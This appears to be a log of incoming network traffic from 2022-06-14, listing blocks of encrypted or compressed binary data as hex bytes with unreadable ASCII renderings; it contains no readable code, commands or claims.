                                                                                                                          2022-06-14 11:50:17 UTC79INData Raw: 39 c4 b0 97 a3 da 90 e7 9a aa 2a 17 0e 59 4a 2b 66 e7 4c 75 11 62 4b 4e 3f f6 48 4d c5 51 fb da de ce 93 27 99 b6 a5 b4 52 93 58 9a d9 57 b1 05 92 fc 98 1f 77 83 d9 0c 38 2e 2a 88 42 3c df b2 62 48 61 6f 03 d3 05 ad c0 7f 64 4e 56 78 d4 d2 a3 3b ad f8 ad a3 91 c6 82 59 bd c7 1c bd 2f a4 68 81 86 77 b8 83 17 b6 6d dd 66 ff 08 44 62 6a 9c a1 14 7e de 7b 2c 9b c3 2c 8b b6 36 6e 48 1e bd 60 1a b5 3a 91 97 b5 f7 c1 08 2f 6a ca 62 1c f7 1c d3 a4 a9 33 1b cd e3 92 7c 66 fe 66 03 5e 3f b8 cc 75 4e 99 8f 49 cc 82 f4 38 04 78 8c 0a 8b 54 de 8a 38 ae 90 11 c9 c6 d5 91 d8 bb 51 ba 64 f4 3b bf 39 82 3d 46 7a f6 22 99 af 58 e4 ca 5e e5 d8 c2 85 de e7 3d d6 13 e6 bd 88 a0 c8 f9 20 84 c2 32 69 94 be 11 15 50 c1 50 2e 24 25 a1 b7 7b 03 6f ce 7b 03 17 c7 12 d7 e6 c0 03 3b
                                                                                                                          Data Ascii: 9*YJ+fLubKN?HMQ'RXWw8.*B<bHaodNVx;Y/hwmfDbj~{,,6nH`:/jb3|ff^?uNI8xT8Qd;9=Fz"X^= 2iPP.$%{o{;
                                                                                                                          2022-06-14 11:50:17 UTC81INData Raw: c5 f4 3b ac d8 ea 2d 99 6e 12 6d 6c c7 9c 89 f8 10 55 7a eb 0b 87 5b 5c 3b d0 ab 97 78 28 b0 cd 91 7e 2a fd be 16 16 a2 1a 7b f3 3c 36 fe 21 0f 3a 19 39 66 50 a8 4e 4c 12 f5 ff 97 65 9c 6f 00 a6 9b c3 52 c4 da 4c b2 ac 57 eb 13 75 77 ef d6 bf e5 f2 88 37 f0 23 ab f5 7e ef 2d fc 23 04 27 5b aa 11 13 64 bf e1 d2 6d e6 0a f5 88 c1 ad 99 fd e6 10 f1 3e a1 6f c9 08 28 6f ce 0c 9f e0 e5 6b b5 37 c8 4a 99 53 71 c2 d9 89 55 6e bf 42 4e a4 01 7b 18 78 e1 e4 a5 d1 e4 1d 35 1f 48 58 d1 f1 c4 48 27 5c 7e 7c 20 10 52 31 e9 32 94 49 7d 97 07 4b 5a d4 79 9e 0a c4 07 38 fb 6a a7 4e 7a cd 61 87 61 11 2a 2b 0d be 3d a9 24 6e c3 55 39 bd 5b 30 61 76 2c 64 e7 12 c3 e1 21 2a 1c cb 2f ec de 6e 87 df c1 da ef 97 6a f4 90 a1 03 92 1c 30 4a 85 50 0b 25 f3 83 07 06 d6 1b c2 36 5b
                                                                                                                          Data Ascii: ;-nmlUz[\;x(~*{<6!:9fPNLeoRLWuw7#~-#'[dm>o(ok7JSqUnBN{x5HXH'\~| R12I}KZy8jNzaa*+=$nU9[0av,d!*/nj0JP%6[
                                                                                                                          2022-06-14 11:50:17 UTC81INData Raw: 58 1d ee 85 37 d3 be d9 10 2d 7d 3d c6 e4 1d 59 d6 a6 8b 6b fc 99 e6 33 80 d6 2f e5 ea 08 56 cf 9e d5 3c 9c 76 ec c3 b8 45 c5 8d d9 ae c6 f3 06 86 97 26 5e 33 25 98 0d b1 9f b6 64 c8 95 9b 37 bb ad 77 eb b0 f3 ca e7 b8 f1 48 51 d1 7e fe 2a bd f0 b3 3c 91 80 03 7a b6 5b b4 ed fa 0d 5f 16 b3 28 87 5b 5c 3d d0 2b c9 32 70 98 fb 81 7f 20 4a 83 40 14 a2 0d 68 e0 2c 2b df 36 27 02 19 39 6c bd 8b 4e 5d 6b f3 fb 86 7e 81 91 e9 b6 8a d4 4f ad 1d e5 c1 91 5d c3 35 62 79 f8 f0 b5 ac f0 82 19 be 66 aa f3 50 dd 23 ed 26 43 21 5a aa 1d 2e 76 a9 cf 9d 56 e7 0c db bb cf 85 9c d1 c7 12 9e 7b 88 4c cf 0e 33 0e 56 ca 9e e6 c4 7c d3 35 1c 59 86 68 63 bc f2 05 e2 5b 30 81 b3 5b d5 7d 34 68 2e e5 a5 db e5 00 6e 35 48 58 d1 e9 e8 15 1c 5d 74 a4 31 13 7f 27 c7 5d 95 57 7d 9d 68
                                                                                                                          Data Ascii: X7-}=Yk3/V<vE&^3%d7wHQ~*<z[_([\=+2p J@h,+6'9lN]k~O]5byfP#&C!Z.vV{L3V|5Yhc[0[}4h.n5HX]t1']W}h
                                                                                                                          2022-06-14 11:50:17 UTC83INData Raw: 39 91 29 a6 7d 91 86 6a b8 83 17 89 f2 f1 57 fd 20 61 77 7c be 99 12 56 ef 6d b6 b9 57 29 9f bd fa fd 62 2c b9 48 1b a4 2c bf b7 b3 f0 e3 5c b7 42 f3 75 14 e7 18 cd 02 2d 25 c1 d4 e6 1b 5d 78 aa 64 09 31 6f b1 dd 7a c5 8e a0 12 09 82 f2 5d fc 45 8e 00 a7 60 c7 9c 20 32 a9 22 a2 c1 d2 84 c4 84 b8 d4 6d ff 2c 2f 06 a6 31 57 75 79 5b b6 9d 59 ee d1 4f 10 b0 fe 84 d4 f6 fa c9 ed 0a d6 80 a7 a7 32 33 8e de 0f 46 ea be 01 13 72 e0 8e 3d 36 23 ba b4 7a 13 6b ec b9 9a 3f f6 07 dd f1 d8 0d 7c 2f be f1 7b 67 1d 32 d8 3f 9c ee ed 3c d3 eb ea 44 b8 aa 93 d9 70 04 02 c1 bb cf 93 d0 f9 44 1f 2c f9 77 e8 0d 8c 88 b6 96 f3 40 48 e5 74 2d 04 7b 92 03 ad 5a 09 6e be 18 cc 26 68 4e c4 f3 9e 8b 41 60 21 68 19 35 1e d7 6c c9 de fc e0 c6 fd c5 37 33 35 35 aa 8e 19 32 5a 6c 8a
                                                                                                                          Data Ascii: 9)}jW aw|VmW)b,H,\Bu-%]xd1oz]E` 2"m,/1Wuy[YO23Fr=6#zk?|/{g2?<DpD,w@Ht-{Zn&hNA`!h5l73552Zl
                                                                                                                          2022-06-14 11:50:17 UTC84INData Raw: fc 3e e5 ad 65 72 e9 fd 95 bf e1 aa 84 f4 0c e2 9f de 95 a8 72 18 e9 61 a3 b5 4a e7 23 39 61 ab d8 91 93 fa 78 a0 2a 13 71 a2 42 64 d9 11 05 e4 7b 56 95 b1 5b 9e 5a 3d 50 cc e4 a5 db 32 09 46 0a 97 58 db fa 4e 67 27 5c 61 a2 22 16 65 36 c3 33 d5 55 7d 97 55 4b 5a d4 f8 9f 0a c4 ba 3b fb 6a d8 4c 7a cd 69 87 61 10 24 1b 0e bf d1 99 20 6e 0f 54 39 ac 8e 23 67 5f 95 71 e5 12 c9 fa 0f 7d 16 35 28 e8 f8 66 90 03 e4 d5 e1 84 6a dc a2 a7 1a 66 0e 18 5d 83 6b 34 3f e0 8f 2a 1c a3 13 3e 37 7d b7 e0 7a 18 79 62 e2 f9 2d 4e 0a c0 57 de 12 1c 32 7e ad 38 6a a4 44 5e ce 39 ec 9b d2 b9 f1 7e db 4c c8 7d eb b3 93 a4 31 84 c3 9b 77 c4 ca cb d3 13 61 e9 93 ff 89 b2 22 54 4b a3 77 6a 27 c7 f6 59 aa 28 c1 82 2b bc 92 ca e1 94 a6 2c 0b f1 43 56 2b 4d f5 53 66 17 a3 5a 48 30
                                                                                                                          Data Ascii: >erraJ#9ax*qBd{V[Z=P2FXNg'\a"e63U}UKZ;jLzia$ nT9#g_q}5(fjf]k4?*>7}zyb-NW2~8jD^9~L}1wa"TKwj'Y(+,CV+MSfZH0
                                                                                                                          2022-06-14 11:50:17 UTC85INData Raw: 0f e3 3e 9a 87 cb 39 fb d9 fa ba bf d3 2e d9 61 07 3b 95 d0 f3 94 bf c8 29 18 27 ed 83 fe e5 70 98 a0 fc e5 15 4c e3 1d 45 32 79 98 1e 47 a6 57 54 48 1e bd 30 02 a1 90 f7 94 53 21 72 0b 45 13 21 ea c5 72 1f f1 9c f1 c9 0b 93 22 38 5c f0 9d 8c 13 02 96 6c 74 f1 01 4b 3a e9 f5 31 2a ea 95 24 ec 15 cf ee ce af d9 b4 81 f6 48 3c ba 4c da fa 2c 74 be 05 32 5a f3 c3 8e e9 07 1d 44 a4 8f 5b 6c 80 77 c9 c8 99 4f 5e 13 b7 39 db ea 9e 6c 41 0d ca a9 a2 9a a6 04 c0 59 1b f9 9f 18 dd b3 ca 03 54 2d 28 ed d3 0a 5d ce dd d6 79 f1 82 3d 2d a8 91 35 e7 ea 08 69 dc a7 fe 2d 91 13 05 c1 66 5a 94 a9 f4 ae dd ea 19 9c e8 1b ee 32 2f 95 36 98 8e a2 79 c0 84 89 0c a8 96 62 65 07 80 39 f6 bd d9 1a 55 d1 c3 91 1d bf b4 b9 14 80 7f 03 70 a5 5c a5 e5 95 05 5e 16 b8 f8 9f 5b 5c 3a
                                                                                                                          Data Ascii: >9.a;)'pLE2yGWTH0S!rE!r"8\ltK:1*$H<L,t2ZD[lwO^9lAYT-(]y=-5i-fZ2/6ybe9Up\^[\:
                                                                                                                          2022-06-14 11:50:17 UTC86INData Raw: e3 f9 21 ce 45 d3 51 df 10 13 39 89 ba 98 3e b2 49 44 cb 17 15 8a d4 a8 23 7a cf 83 db 79 84 a5 84 b7 2a 86 d3 91 5a 75 c8 da d5 13 8e fd ac cc 82 b6 1c f6 58 a5 68 71 c8 d7 d6 78 b5 38 c4 ba b9 b2 99 d9 ed 87 ae 02 3c 0d 42 70 30 55 01 5c 64 03 b2 63 66 2c de b8 5d c9 7f 15 de ad d1 fb f1 bb 90 8f 4e 59 b8 46 9b ce 6d 5a 2c bf f8 8b 10 4e 75 f0 f1 3e 22 08 5d 58 e6 f1 b4 4e 49 6b 1b 3f c5 2d a3 d7 64 73 7f 17 6c d5 d8 81 16 24 fb ab 8d dd e9 80 53 bc ff 2d 87 0a b1 4c 96 b7 71 a8 83 1d 94 07 e9 64 f9 2a 08 77 6a 96 a0 3b 70 e7 7b 26 80 f7 44 8a ba eb f1 62 90 be 48 1b de 15 95 84 b8 e3 cb 5a 0f 7b d9 59 05 e1 0d d1 45 2e 26 c1 d4 d5 ac 70 78 bb 55 28 54 57 37 dd 7c d5 f9 0f 26 0d 83 e7 13 2c 5c e1 1f 8a 45 dc b3 be 37 81 10 c9 ee d6 91 d8 bf 94 c4 72 e4
                                                                                                                          Data Ascii: !EQ9>ID#zy*ZuXhqx8<Bp0U\dcf,]NYFmZ,Nu>"]XNIk?-dsl$S-Lqd*wj;p{&DbHZ{YE.&pxU(TW7|&,\E7r
                                                                                                                          2022-06-14 11:50:17 UTC88INData Raw: df c3 ee 7b f6 84 ee 2f af ef 08 f4 f4 33 a4 cd 38 4c 2a ad 4b 24 d0 6d 59 6e 12 e5 aa 48 4e 02 57 f7 2c 4f 3f 04 8c 34 9b 8e ba 66 07 9c 07 35 d4 83 77 ed 98 91 fe e7 b2 53 59 5a c6 13 ed 21 ac b8 a4 ea 82 73 12 76 a7 4b 85 36 89 61 5d 16 b8 3b 8e 4a 58 28 f1 3d da 18 49 2a fe 91 7e 31 6b 87 60 8e b1 05 79 f5 34 27 f6 41 55 6f 1b 33 7f 69 9a 5f 58 30 b7 fb 86 72 9d 34 14 b7 8a d3 57 ca ff cc 59 97 56 e1 3d 85 79 fe d2 1b fd f0 88 30 8c 70 bb e7 6f 72 72 ed 2c 6a 32 a2 aa 17 08 42 4d e7 bd 58 f0 dc 7e b6 cf 85 97 ea e8 00 8d 70 b6 7c dc 26 c3 60 a1 cd 8d ef f9 69 b4 53 25 58 8c 44 77 c3 de 16 f6 79 36 bb b1 5d c6 e3 3a 50 cc e5 b6 f9 e6 2b 50 1b 44 70 ca fa ec 6c 85 4d 56 b5 34 9a 29 36 c3 33 77 44 5f 8f 16 59 72 c5 7f 9e 00 66 72 18 e8 49 dc 6f 6e d9 6d
                                                                                                                          Data Ascii: {/38L*K$mYnHNW,O?4f5wSYZ!svK6a];JX(=I*~1k`y4'AUo3i_X0r4WYV=y0porr,j2BMX~p|&`iS%XDwy6]:P+PDplMV4)63wD_YrfrIonm
                                                                                                                          2022-06-14 11:50:17 UTC89INData Raw: ac 36 62 6a 97 08 02 75 f1 53 13 90 ee 21 80 c4 67 aa 4a 1e bc 5e 35 c5 38 97 8e 88 9a 16 b4 d2 7b db 59 ee e0 0d dd 3c 36 14 c1 de fa 97 5b 4c bb 74 12 4a 3f ab f5 c8 d5 88 8e 49 32 83 f4 34 16 49 9f 1a a3 bf d7 9b 37 5b be 17 a6 c7 c2 82 cb aa e4 8d 6d f5 31 a6 06 b8 0d 45 5b 44 14 9e ae 52 fd c7 48 96 b0 ff 84 d4 f6 fa df aa 00 d3 80 a7 a7 39 33 8e de 0f 79 ea a5 7f 2b 5b d6 8c 2c 20 59 92 9d 49 14 04 2c ae 00 1d ed 06 ca e4 d4 c5 4d 0e 97 d9 2d 71 87 57 ca 81 42 e6 ee 13 05 c5 e4 44 be de bf 85 70 02 19 1a c5 ea bf c7 ee 3b 30 42 fd 7d f9 9c cd 98 b1 ff cb 50 58 8c dc 2b 05 71 8e 07 4a 4c 45 52 c5 24 dc 21 01 9a d5 e5 87 46 58 56 04 54 03 26 02 ef 63 c9 0a fd e0 ca 30 ca 37 2e 4d 49 b9 98 02 1e 93 b7 4b 50 04 b5 a5 a7 ec 30 fe f9 b5 46 f7 05 ee 66 6a
                                                                                                                          Data Ascii: 6bjuS!gJ^58{Y<6[LtJ?I24I7[m1E[DRH93y+[, YI,M-qWBDp;0B}PX+qJLER$!FXVT&c07.MIKP0Ffj
                                                                                                                          2022-06-14 11:50:17 UTC90INData Raw: 99 49 84 96 f9 e8 16 9e 7d a0 6f cf 0e 3b 61 a1 cb c8 e0 ef 7a c0 21 1e 59 3a 43 64 d3 c1 07 e2 51 5f bf b1 5b c4 5e 35 50 ee e1 a5 db 25 09 46 1b 39 4d d9 fa e6 6c 54 2a 76 a2 28 1a 70 1e bb 36 d5 53 55 ee 03 4b 5c fc dd 9d 0a c2 10 4d f9 6a c7 23 02 cf 74 8d 69 39 4d 2f 0d b9 0e e2 24 6e c3 7c 9b be 98 36 12 10 5d 71 ef 7d b1 e9 09 68 17 e3 51 c0 f0 69 af a9 ed ca ed bf ce df b3 a7 70 ef 0d 34 51 ee 00 32 25 f9 81 02 77 a1 0e c6 1e 2c bf f1 78 39 b4 90 e3 ff 54 35 16 d3 5b b1 7b 18 28 8a a4 3c 11 b6 49 43 f5 40 e8 8a d2 8a ad 7c f7 46 aa 0e 86 b4 98 cb 43 95 c6 8d 6c ea b4 de d5 02 b7 97 bb fc 97 89 a4 50 5a a3 1b 17 db c6 d0 3f db 3b c4 ba 99 8b 18 dd e7 92 9f 55 13 0f 44 52 ac 62 18 48 06 66 a1 4b 44 41 a6 b0 4c cf 5f c0 5d a9 db 97 0f 17 b8 8d 48 7b
                                                                                                                          Data Ascii: I}o;az!Y:CdQ_[^5P%F9MlT*v(p6SUK\Mj#ti9M/$n|6]q}hQip4Q2%w,x9T5[{(<IC@|FClPZ?;UDRbHfKDAL_]H{
                                                                                                                          2022-06-14 11:50:17 UTC92INData Raw: 6d 52 c7 d4 f5 83 c1 d7 d1 19 2d ff 12 c2 f2 8e 9f b7 e8 dc 2e 8f e2 1b 20 14 6f 8f c2 40 4c 47 56 a7 0a 53 96 38 34 3b 0c 6b 44 44 52 df 56 13 24 1e d5 77 df ae 02 1f 33 25 ef 26 38 5b 8f aa 8e 13 08 b7 93 bb e4 fd 46 47 b6 cc 26 33 da 91 57 b4 15 cf e8 0e a5 c3 28 ea e3 4a 3d a3 5c d4 fa 12 88 ed 01 38 74 c1 d6 94 f8 07 9c 40 a4 83 f2 62 80 47 35 9d 9d 45 70 20 a2 23 c4 ea 1d 68 41 01 64 b0 90 b0 af 2c 30 61 31 fe 8c 1f cb 92 e2 16 42 34 11 c1 e4 16 95 c2 c8 4c 6a fb e0 ef 3d a5 f8 11 e1 fb 06 6d 89 b2 fb 3a f3 ad 33 c3 60 7d e7 a3 f9 73 c6 f8 15 8d f2 22 58 5c fd 92 25 99 88 6c 7d 19 84 98 25 73 87 77 eb a1 b6 ef e2 ae 9e 9b 50 d1 c3 ed 2c ac b0 a2 39 86 10 d0 7b b6 52 a7 ea f2 38 6d 14 b2 2e 96 5d 74 1d d0 2b c3 10 48 98 fb 9b 47 a9 4a 96 40 05 a5 38
                                                                                                                          Data Ascii: mR-. o@LGVS84;kDDRV$w3%&8[FG&3W(J=\8t@bG5Ep #hAd,0a1B4Lj=m:3`}s"X\%l}%swP,9{R8m.]t+HGJ@8
                                                                                                                          2022-06-14 11:50:17 UTC93INData Raw: 43 2a e2 3e ec 8c c5 a9 1e 76 98 01 d8 79 82 6a 9d 81 13 ba c6 87 6e d1 c4 f2 fb 04 9f e2 61 fc 80 a6 33 82 49 a2 79 67 c8 d6 e4 0e 5c c6 3b b6 bb ab b3 d9 e7 95 ab 2a 17 0f 42 c4 2f 6c d0 4f 61 0c a3 4b 4f 2e de a2 4e 41 c3 ea d1 b0 db 91 26 88 8c 88 4e e0 91 5e 89 09 7f 4b 15 8d e6 a3 ce 5f 79 d2 24 a9 26 02 8d 6e 1f d9 9a 46 42 12 70 2c c4 27 a3 db 5f ef 49 78 79 d5 cb 84 2f a6 ee b4 be 2e d7 8d 44 96 0c 09 95 29 3c 79 88 b6 79 3c 83 1d 9e f4 c8 69 e0 3f 57 fe 7b 99 b0 33 dc e5 7b 2c 0d ff 24 84 a4 86 67 5b 11 a1 68 8c b1 3a 97 18 a3 ff f4 6b 8e 6a c0 71 88 f0 02 c5 0a 88 24 c1 de 6c 90 7a 41 a3 7b 5c c2 3f bf c2 76 f4 7a 88 26 0d 1e e5 3d 22 4e 91 3d 17 54 d9 84 3d 14 14 16 a6 c1 48 80 dd b3 86 f5 bc f5 3b b5 b2 82 3a 48 7d 4c 82 9e ae 58 72 ca 56 95
                                                                                                                          Data Ascii: C*>vyjna3Iyg\;*B/lOaKO.NA&N^K_y$&nFBp,'_Ixy/.D)<yy<i?W{3{,$g[h:kjq$lzA{\?vz&="N=T=H;:H}LXrV
                                                                                                                          2022-06-14 11:50:17 UTC94INData Raw: bd ec ea 8f 77 23 c8 77 5c 6e 12 cb f7 38 06 ea 8a ce 33 5c 33 6e 8f 25 9f 9f b6 6e 16 11 9d 1d bc bc 76 eb b0 73 ff e7 b8 fd 48 51 d1 d8 fe 2a bc af 83 38 91 52 02 7a b6 8c b4 ed eb 63 4a 14 b2 22 8d 44 46 13 04 2b c9 32 59 3e ff 91 78 08 69 96 40 1e ae 18 40 db 2d 30 e5 0b 2f 6c 1b 39 64 50 63 4f 4c 12 ce 6d 87 74 8d aa 17 a6 8e c5 ce 84 eb e4 c0 84 5a fa 19 70 66 f4 45 86 a0 9f b0 30 9f 68 a7 fc 6b f0 35 fe 21 53 d7 5a aa 17 13 64 bf ea 27 41 e2 1b f6 f6 c8 84 96 f3 f1 26 9b a0 11 6f cf 0e 28 64 89 6c 9a e0 e9 52 99 21 1e 53 9a d8 77 d5 de 02 f3 57 77 45 b0 5b d9 01 77 50 cc ee 8d 7c f3 09 40 22 b0 59 db fc 83 2c 27 5c 7e b1 2b 07 7e 21 4e 68 d5 55 7c 84 0b 5a 56 c2 60 de 97 d5 6f 55 c3 6b cd 46 6d 57 67 81 70 18 1f 83 09 bf 20 b1 19 6f c5 5e 2f 27 8b
                                                                                                                          Data Ascii: w#w\n83\3n%nvsHQ*8RzcJ"DF+2Y>xi@@-0/l9dPcOLmtZpfE0hk5!SZd'A&o(dlR!SwWwE[wP|@"Y,'\~+~!NhU|ZV`oUkFmWgp o^/'
                                                                                                                          2022-06-14 11:50:17 UTC95INData Raw: 11 fa 4a 18 b7 60 33 b1 3a 9d 5a b2 f6 c3 4b 2d 6a c1 61 14 e1 0d db 2a 1e 31 d4 de e2 9c 75 5e ab 7f 33 5a 2e 54 dd 7c d4 53 88 26 1c aa 57 32 3d 4f a6 be 8f 45 d0 f4 63 34 81 1c ad b2 0f 90 d2 a6 87 dd 75 9a ec b4 2e 99 3d 50 1c b0 4c 9e a4 50 f7 b4 81 8b df c9 8d f4 70 eb cf c5 53 55 82 a1 c2 fb 2c 9e 59 0c 63 fb b8 03 10 4b d3 9c 2b ac 27 a9 8b 5f 8e 7a e3 b6 16 8b d0 06 c4 e1 51 0a 51 06 a9 6d 60 74 9c 4b 7b 2f 99 f4 ea a7 ea d6 f3 52 22 d4 d5 c6 66 9e 02 c3 cb fa 84 4c ee 2e 07 27 ef e1 ee f6 91 92 a7 65 dc 44 57 ef 0d b6 14 7e 87 19 45 c4 47 47 a9 11 cb bd 16 8c da fc 82 c9 5f 40 66 93 18 35 1e cc 0b 38 f1 fc ea ce 35 c7 a8 8f 35 45 ab 8e 19 05 aa c3 75 e7 f5 43 35 7e cd 27 22 e0 4b 72 f2 3c e2 e8 dd af d0 3d 88 f2 27 39 ab 56 c1 93 3f 5e ed 0b 48
                                                                                                                          Data Ascii: J`3:ZK-ja*1u^3Z.T|S&W2=OEc4u.=PLPpSU,YcK+'_zQQm`tK{/R"fL.'eDW~EGG_@f5855EuC5~'"Kr<='9V?^H
                                                                                                                          2022-06-14 11:50:17 UTC97INData Raw: d9 8d e8 ef 6b a8 3c e0 58 a0 4c 62 c4 15 10 34 dc 05 bf b1 5a d2 73 2e 58 cc f5 ad c1 09 08 6a 0d 48 d6 6c f0 f7 75 2f 5c 65 aa 3d 1d 86 37 ef 38 c4 53 6c 92 35 7d 45 d8 6c 96 0a d5 6b 27 05 6b e1 47 6c cb 6c 5d 72 16 24 2f 13 ac 2e 99 31 66 da 46 c7 bc b4 3d 70 63 4e 76 db 04 36 14 f6 7d 0c d8 21 c4 e1 67 98 d8 17 cb c7 9b 7d d9 a2 a7 d9 8e 20 7f 44 8f 6b 38 25 e2 81 33 f3 a4 22 cc 1e e9 bf f1 78 ef 1d 92 e3 e3 34 4a 14 c2 59 c6 fd 1b 04 90 af 0d 00 3e 48 45 d7 2a ac f5 2b 5d f0 66 e4 48 d9 68 8c af 6c a5 17 9d c5 e8 63 c3 ca d0 d9 18 8c e0 bf ed 99 be 34 aa 5b 89 7a 69 c8 c2 cb 55 b2 3f 1e 98 e4 a1 99 d3 7a 8b a6 39 1f 0f 53 72 31 69 e6 4f 59 18 9b 52 b1 d1 21 ad 5c d6 5f e8 cf a5 cd 6f 26 bf bf 9a 5d 5b 93 4f 81 c0 6c b5 05 be f8 a0 1f 67 17 26 f3 c1
                                                                                                                          Data Ascii: k<XLb4Zs.XjHlu/\e=78Sl5}Elk'kGll]r$/.1fF=pcNv6}!g} Dk8%3"x4JY>HE*+]fHhlc4[ziU?z9Sr1iOYR!\_o&][Olg&
                                                                                                                          2022-06-14 11:50:17 UTC97INData Raw: d8 3e e4 c6 93 9c 8b 4e 4c fc e6 f9 86 90 8b b9 13 53 8a d2 43 42 14 1b 3e 8a 45 e1 15 77 73 e1 cd 69 ad dc 81 09 81 63 aa f5 67 e8 30 e7 2c 7a 10 45 a5 e9 03 46 a7 df b1 53 e7 0a ec 89 dc 8f 96 e8 ec 09 95 83 a1 43 de 08 11 ea a3 cb 94 6c c0 7a a0 21 0d 5c 93 4e 77 d9 cf 16 e8 4e 4c 41 b0 77 d6 56 dd 50 cc e4 ba cf e4 03 46 1b 40 47 c2 04 ed 4a 2e 64 ba a2 22 16 67 2c d0 38 d5 44 77 88 1b b5 5b f8 5e 8f 0d d0 4b 80 ff 6a cb 5a f7 ca 74 87 60 05 23 3f 25 27 26 99 2a 46 d4 54 39 b7 8b 35 7e 7a 4c 7b e5 03 c3 f4 12 9c 1e e7 24 d5 f8 1c 0b d7 e9 c0 f8 90 73 c0 a0 ab 03 89 05 2b 55 7f 79 1c 34 f5 a1 a7 0f a5 04 4c dc 51 bb f0 6d 14 09 9c f0 f3 27 53 1e ca af df 2f 0e 20 ef b9 15 6f b8 61 fc d9 3f ea e5 fb a0 0f 75 fa 5a ca 73 84 a5 98 bb 25 69 c7 ab 63 d6 d9
                                                                                                                          Data Ascii: >NLSCB>Ewsicg0,zEFSClz!\NwNLAwVPF@GJ.d"g,8Dw[^KjZt`#?%'&*FT95~zL{$s+Uy4LQm'S/ oa?uZs%ic
                                                                                                                          2022-06-14 11:50:17 UTC99INData Raw: de cf 20 2c 81 8d c1 80 64 8e d4 29 69 e6 aa 1a 15 4b dc 97 c3 31 1a aa 94 5a 15 75 f5 a4 00 06 cb 14 23 f6 e1 18 4c 0f b5 f1 60 7b 98 4d 19 3f b0 f2 ed 3f d3 6d ea 44 b8 ed f3 d8 70 08 3b fd d4 f3 98 e9 6b 2b 18 2d e6 6c ec f9 8e 88 bb e3 33 40 64 f8 0a 2f 12 53 d0 17 53 5e 7e 6c b7 1f d7 09 ba 8d c5 f5 bc 76 4e 45 03 e7 02 26 1e c4 75 eb ee 02 e1 e0 24 d3 35 3e 45 96 b9 84 13 19 88 89 8b e6 d3 4c 4b b3 c0 3b 3b e0 95 46 dd 0b c6 16 dc 89 ca 01 8a 09 b7 c2 b6 5c d8 ea 3a 4d e7 18 cc 5d 7d c9 85 fb 39 61 08 a7 89 ff 55 b4 6e e1 97 b5 f3 5c b1 a0 0b e1 c2 c8 62 e3 11 7b b2 b8 98 a5 33 34 a6 1a d3 85 27 bc ba d9 16 5d 31 2f cc e2 0a 42 c0 db b2 6b d0 99 29 34 b2 28 11 ed f5 11 56 cf b6 ea 36 83 68 cc c2 4a 5a f1 a3 e3 78 d5 ff 0a 98 f7 39 5c 22 25 8c 29 61
                                                                                                                          Data Ascii: ,d)iK1Zu#L`{M??mDp;k+-l3@d/SS^~lvNE&u$5>ELK;;F\:M]}9aUn\b{34']1/Bk)4(V6hJZx9\"%)a
                                                                                                                          2022-06-14 11:50:17 UTC100INData Raw: 9f ce eb 09 63 0b df 3d ec 68 6f 87 df f6 ef 67 c6 6c dc b2 89 fb 98 0f 3e f9 90 70 24 31 e7 a1 b2 0d a5 04 e8 27 51 bb fb 73 07 1f 87 cb a8 25 42 12 c5 dc d9 03 1a 29 94 b8 00 47 2a 49 45 d7 27 60 db d4 a2 0e 57 b7 41 d9 73 93 38 c3 a4 3b 96 ee 7f 64 c2 c0 f2 36 04 9f e2 ac f5 82 a7 1c ed 5a a5 68 69 cd ee 55 54 a3 3f dc 3d 96 a3 99 d8 f4 9c a6 22 01 1e 44 62 f6 ea 49 4e 75 10 01 5a 46 39 c6 3e 1d c5 57 e9 7c bc d3 85 33 87 94 15 4e 53 99 76 98 df 7f 41 17 96 fd 9f 32 d0 7d d8 0a 26 af 05 8b 46 3d ca 92 5d 41 77 7e 3f c2 fb 25 95 7f 62 67 da 68 dc cf 97 2f af 2e b0 9a b4 10 58 df e7 ec 09 94 8b b1 60 93 ba 4d 91 1b 1d 9e 62 f1 77 f9 20 6d 71 6d 87 ae 3b f1 e5 7b 26 8e fe 03 0e b9 eb f1 5b 18 67 5f c7 ae 15 86 83 9a 57 e9 4b 27 75 d0 59 85 e3 0d d1 fc 01
                                                                                                                          Data Ascii: c=hogl>p$1'Qs%B)G*IE'`WAs8;d6ZhiUT?="DbINuZF9>W|3NSvA2}&F=]Aw~?%bgh/.X`Mbw mqm;{&[g_WK'uY
                                                                                                                          2022-06-14 11:50:17 UTC101INData Raw: 56 66 38 98 fe 65 ba ee e1 9d 9d d3 49 b6 bf 03 06 c2 c8 68 dd 1a 6f a2 a7 b0 33 3d 3d 43 3b 79 8c 1f cc 26 c8 11 5e 1e e7 c6 e2 1b d4 ce ce 51 4a 6e 93 38 3c 39 ef 05 fb f5 73 d9 d4 b1 e4 35 bc df 32 c3 66 cc f1 a2 eb a4 e6 40 15 8d e4 af 4d 34 30 98 05 79 9f b6 6e 8a 86 9a 02 b0 98 24 77 a1 b5 e1 ea a7 8b d4 40 d6 da f0 0a 28 b4 b3 3c 0d 6e 04 65 b9 4b c8 71 eb 17 40 06 a4 b4 96 5c 43 2a c6 b7 d8 3f 6e 8a ed 0d 6f 27 55 85 56 88 b3 17 77 f4 3b ac fe 35 38 78 0d a5 7d 7f 94 58 6c e7 e6 f9 86 e8 9a be 0c a0 9c 4e 52 d9 f4 fc d7 0b 47 ec 0a 7f 59 7e d8 97 ac 6c 99 36 80 78 bc 69 69 f9 3c f6 3a f7 0b 5d b5 0b 14 f6 bf e0 a2 4f c7 8a f3 99 cf 19 87 fe f9 08 be fd a0 6f cf 92 28 66 be d4 88 7c fe 7d bf 00 3e a6 8c 42 64 4f de 00 fd 70 49 23 a0 5c c0 4c 2b cc
                                                                                                                          Data Ascii: Vf8eIho3==C;y&^QJn8<9s52f@M40yn$w@(<neKq@\C*?no'UVw;58x}XlNRGY~l6xii<:]Oo(f|}>BdOpI#\L+
                                                                                                                          2022-06-14 11:50:17 UTC102INData Raw: 04 5d 5a 76 7a 4a 5a 3c ba dc 60 10 f8 69 6a cd c7 ea a0 b8 eb b1 94 f5 58 93 40 ad f3 66 0b 38 b3 74 98 c0 c7 a8 90 00 81 16 47 77 ea 2c 79 ef 3b 96 aa 12 45 f6 6a 3f 87 f1 55 01 aa f8 ec 55 58 23 59 0e a9 25 d7 1a a3 e3 f0 54 1a f4 d1 62 0e fe 28 45 3b 0d 3f de b3 6e 90 66 42 b5 40 9d 4f 3d ad c2 02 4a 99 9b 35 07 aa 30 36 3d 43 91 1a a3 d4 d4 9b 3b 27 86 14 b1 f2 c2 85 de bd 81 d9 79 e6 31 9d eb 97 35 51 6c 7c 65 0f ac 58 e4 c8 5e 89 b0 c4 84 d4 fa 87 ec c5 3c d2 80 a1 c8 f3 73 d5 fc b1 61 fb b3 38 23 5a d6 80 8a 23 3f ba 8f 41 03 62 f1 74 17 c1 4c 52 dd f7 cc 16 